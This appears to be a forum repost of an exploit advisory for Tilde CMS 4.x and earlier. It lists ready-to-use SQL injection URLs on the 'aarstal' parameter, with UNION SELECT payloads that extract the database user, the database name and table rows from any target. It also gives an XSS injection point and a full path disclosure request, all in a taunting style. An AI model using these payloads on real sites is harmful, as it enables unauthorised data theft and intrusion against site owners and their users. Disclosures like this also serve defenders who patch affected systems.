Jump to content
drgs

Tilde CMS <= 4.x (aarstal) Remote SQL Injection Vulnerabi

Recommended Posts

Posted
#By KiNgOfThEwOrLd				

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so
---------------------------------------------------------------
SQL Injection

[url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the
database...as:

[url]http://[target]/[/url][tilde_path]/index.php?id=[yeardetail_id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some recordes by the database like:

[url]http://[target]/[/url][tilde_path]/index.php?id=[id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]
/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

[url]http://[target]/[/url][tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

[url]http://[target]/[/url][tilde_path]/index.php?search=%
3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...